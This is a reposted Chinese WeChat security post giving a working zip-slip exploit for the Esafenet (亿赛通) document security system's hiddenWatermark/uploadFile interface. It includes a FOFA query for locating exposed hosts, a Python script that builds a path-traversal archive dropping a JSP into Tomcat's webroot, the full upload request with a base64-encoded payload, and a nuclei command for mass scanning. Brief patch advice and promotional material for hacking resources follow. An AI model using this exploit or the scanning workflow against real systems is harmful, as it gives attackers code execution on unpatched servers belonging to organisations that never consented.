亿赛通hiddenWatermark/uploadFile接口zipslip漏洞
前言:本文中涉及到的相关技术或工具仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担,如有侵权请联系。
由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!
漏洞详情:
亿赛通电子⽂档安全管理系统是⼀个集⽂档加密、权限控制和操作审计于⼀体的软件,用于提升企业文档的安全性和管理效率。亿赛通由于安全控制不严格,攻击者可以通过特定方式将文件上传到服务器的特定位置,获取系统权限。
原理分析:
亿赛通由于安全控制不严格,攻击者可以通过特定方式将文件上传到服务器的特定位置,获取系统权限。
影响范围:
亿赛通电子文档安全管理系统
version <= V5.6.1.109.139
资产测绘
FOFA:app="亿赛通-电子文档安全管理系统"
漏洞利用
⾸先准备要上传的jsp⽂件和⼀个theme⽂件
0X01:
vulzip.jsp
<%out.println(1234*1234);new
java.io.File(application.getRealPath(request.getServletPath())).delete();%
theme1.xml
<!--
{"FileName":"sss","FileSize":"111","UserName":"ss","Department":"ss","User
ID":"ss","time":"12"} -->
调用python生成zipslip的压缩包
import zipfile
zipFile = zipfile.ZipFile("yisaitong.zip", 'w')
info = zipfile.ZipInfo("yisaitong.zip")
zipFile.write("vulnzip.jsp",
'../../../../../tomcat/webapps/ROOT/yisaitong0125.jsp')
zipFile.write("theme1.xml", 'theme/theme/theme1.xml')
zipFile.close()
然后将压缩包上传到对应接⼝
POST /CDGServer3/hiddenWatermark/uploadFile HTTP/1.1
User-Agent: PostmanRuntime/7.36.1
Accept: */*
Postman-Token: 8fe3a98d-d8f3-4913-a2bb-dd12d8eb525e
Host: 127.0.0.1
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Type: multipart/form-data; boundary=-------------------------
-493560928362649065295366
Cookie: JSESSIONID=10FF060B26263715F710C3C8E7AA0BE2
Content-Length: 731
----------------------------493560928362649065295366
Content-Disposition: form-data; name="doc"; filename="yisaitong.zip"
Content-Type: application/zip
base64解
码:UEsDBBQAAAAAAKRQOlgcVX9OaAAAAGgAAAA0AAAALi4vLi4vLi4vLi4vLi4vdG9tY2F0L3d
lYmFwcHMvUk9PVC95aXNhaXRvbmcwMTI1LmpzcDwlb3V0LnByaW50bG4oMTIzNCoxMjM0KTtuZ
XcgamF2YS5pby5GaWxlKGFwcGxpY2F0aW9uLmdldFJlYWxQYXRoKHJlcXVlc3QuZ2V0U2Vydmx
ldFBhdGgoKSkpLmRlbGV0ZSgpOyU+UEsDBBQAAAAAACxSOlhfbJFsaAAAAGgAAAAWAAAAdGhlb
WUvdGhlbWUvdGhlbWUxLnhtbDwhLS0geyJGaWxlTmFtZSI6InNzcyIsIkZpbGVTaXplIjoiMTE
xIiwiVXNlck5hbWUiOiJzcyIsIkRlcGFydG1lbnQiOiJzcyIsIlVzZXJJRCI6InNzIiwidGltZ
SI6IjEyIn0gLS0+UEsBAhQDFAAAAAAApFA6WBxVf05oAAAAaAAAADQAAAAAAAAAAAAAAKSBAAA
AAC4uLy4uLy4uLy4uLy4uL3RvbWNhdC93ZWJhcHBzL1JPT1QveWlzYWl0b25nMDEyNS5qc3BQS
wECFAMUAAAAAAAsUjpYX2yRbGgAAABoAAAAFgAAAAAAAAAAAAAApIG6AAAAdGhlbWUvdGhlbWU
vdGhlbWUxLnhtbFBLBQYAAAAAAgACAKYAAABWAQAAAAA=
----------------------------493560928362649065295366--
访问上传文件上面命名的jsp文件
漏洞修复建议
1、升级系统到最新版本;
http://www.esafenet.com
2、检测数据包中可能包含明显的目录遍历痕迹,如使用../等路径。
Nuclei-POC利用命令:
nuclei -t hiddenWatermark-uploadFile-uploadfile.yaml -l url2.txt -o 存在漏洞.txt
POC关注公众号回复 "亿赛通0226"获得~
往期推荐
关于我们:
感谢各位大佬们关注-不秃头的安全,后续会坚持更新渗透漏洞思路分享、安全测试、好用工具分享以及挖挖掘SRC思路等文章,同时会组织不定期抽奖,希望能得到各位的关注与支持。
关注福利:
回复“google工具" 获取 google语法生成工具
回复“burp插件" 获取 bp常用插件打包。
回复“暴力破解字典" 获取 各种常用密码字典打包
回复“XSS利用文件" 获取 现成XSS利用文件.pdf
回复“蓝队工具箱”即可获取一款专业级应急响应的集成多种工具的工具集
知识星球
星球里有什么?
web思路及SRC赏金,攻防演练资源分享(免杀,溯源,钓鱼等),各种新鲜好用工具,poc定期更新,以及一些好东西,专栏会持续更新
限时优惠立减,提前续费有优惠,好用不贵很实惠
交流群
关注公众号回复“加群”,QQ群可直接扫码添加,内部交流,以及发布多个岗位要求,基本上每天都会发布数量不等的岗位招聘信息。
免费帮助正规安全单位发布招聘信息,需要的可以加我联系方式
安全考证
需要考以下各类安全证书的可以联系我,绝对低价绝对优惠、组团更便宜,报名成功先送星球一年,CISP、PTE、PTS、DSG、IRE、IRS、NISP、PMP、CCSK、CISSP......
球分享
球点赞
球在看
原文始发于微信公众号(不秃头的安全):漏洞情报1day-亿赛通hiddenWatermark/uploadFile接口zipslip漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论